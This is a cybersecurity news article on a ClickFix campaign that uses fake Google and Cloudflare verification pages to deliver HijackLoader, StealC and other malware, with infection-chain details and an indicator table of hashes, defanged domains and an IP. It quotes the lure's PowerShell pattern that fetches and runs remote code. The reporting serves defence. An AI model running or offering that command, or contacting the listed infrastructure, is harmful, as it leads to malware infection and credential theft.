News·4 min read

Fake Google and Cloudflare Verification Pages Spread Multiple Malware Families

A sprawling ClickFix campaign that abuses fake Google and Cloudflare verification pages to trick users into infecting their own machines. Documented by Malwarebytes, the operation delivers a wide rang

CS
CyberShield Team
2026-07-03
Share:
Fake Google and Cloudflare Verification Pages Spread Multiple Malware Families

A sprawling ClickFix campaign that abuses fake Google and Cloudflare verification pages to trick users into infecting their own machines. Documented by Malwarebytes, the operation delivers a wide range of payloads including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, and a Rust-based stealer, all tied to shared infrastructure active since late 2025. ClickFix attacks don’t […] The post Fake Google and Cloudflare Verification Pages Spread Multiple Malware Families appeared first on Cyber Security News.

A sprawling ClickFix campaign that abuses fake Google and Cloudflare verification pages to trick users into infecting their own machines. Documented by Malwarebytes, the operation delivers a wide range of payloads including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, and a Rust-based stealer, all tied to shared infrastructure active since late 2025. ClickFix attacks don’t rely on exploits. Instead, they socially engineer victims into copying and running malicious PowerShell commands themselves, often under the guise of “verifying” they’re human. Fake Google and Cloudflare Verification Pages The campaign uses fake reCAPTCHA prompts, spoofed Cloudflare “Verify you’re human” pages, bogus Google Meet audio-fix notices, and even a fake QR code generator, all funneling victims toward the same core lure. Fake Cloudflare Verification Page (Source: Malwarebytes) Some kits, like the “New sign-in with trusted token” template, even include an “approval gate” that lets the attacker manually choose which command a given victim executes, suggesting active human operators are overseeing parts of the campaign. Despite the varied disguises, the underlying infrastructure leaves consistent fingerprints. Payloads are typically extracted to the folder C:\ProgramData\Zooms, and the PowerShell commands victims are tricked into running follow a recognizable pattern along the lines of powershell−c”iex(irm′{IP}:{Port}/{Path}′−UseBasicParsing)”. Payload delivery frequently runs through Cloudflare R2 storage buckets, with the hosting infrastructure tied to the ASN of Dedik Services Limited, and, in several cases, the malicious server responds to unexpected requests with a page containing only the string “hehe.” These indicators aren’t present in every single infection chain, since the attackers continually tweak ports, paths, and delivery mechanisms, but taken together they point to one coordinated operation running multiple lures in parallel. One particularly notable infection chain begins with a trojanized version of the legitimate Franz messaging app. The backdoored app’s index.js reads a campaign key from a local readme.txt file, checks in with a command-and-control server, and can execute arbitrary JavaScript or drop and run additional files, including a set of DLLs used to hijack the legitimate ssh-add.exe binary. Malwarebytes stated that DLL hijacking ultimately loads a previously undocumented loader, which the researchers have dubbed ResiLoader, an obfuscated .NET NativeAOT binary. ResiLoader drops the OPSWAT AppRemover driver, pcdhost.sys, and uses it to terminate more than 140 processes associated with antivirus and EDR tools before attempting a UAC bypass via the elevated COM interface ICMLuaUtil. Fake Google Verification Page (Source: Malwarebytes) It then establishes persistence through a Run registry key disguised as “Google Update” and finishes by performing process hollowing on ServiceModelReg.exe to launch the StealC infostealer in memory. The campaign’s shifting infrastructure, with rotating ports, IP addresses, and lure templates, makes static indicator-based detection unreliable on its own, which is why behavioral defenses matter as much as blocklists here. Its reliance on trusted brand names like Google and Cloudflare, combined with urgency tactics such as countdown timers and fake unauthorized sign-in warnings, exploits user psychology rather than a software vulnerability, a pattern consistent with how ClickFix has evolved more broadly over the past two years. The most effective defense remains simple: never paste or run a command from a webpage claiming to “verify” you’re human, since no legitimate Google, Cloudflare, or Microsoft service ever requires this. Treat any unsolicited instruction to open PowerShell, Command Prompt, or Terminal as a red flag to verify through official support channels, and keep endpoint protection with web filtering enabled so that malicious domains are blocked before a command is ever copied. TypeIndicatorDescriptionHash (MD5)72907d0ca3258365838626f6a8d993a6ResiLoader DLLHash (MD5)0234E3188F2883A438B3F2BEAB7A78B2StealCHash (MD5)6a9ac6b3fff7b695dbd4df6ff7f6c516Remus StealerDomainantibotv3[.]comDistributes ClickFix pagesDomaingenerator-qrcode[.]onlineDistributes ClickFix pages (QR code lure)Cloudflare bucketpub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]devPayload distributionIP151.240.151[.]126Payload distribution Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM. Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google. The post Fake Google and Cloudflare Verification Pages Spread Multiple Malware Families appeared first on Cyber Security News.

Share:

Join the Discussion

Comments coming soon. Follow us on social media for real-time discussions.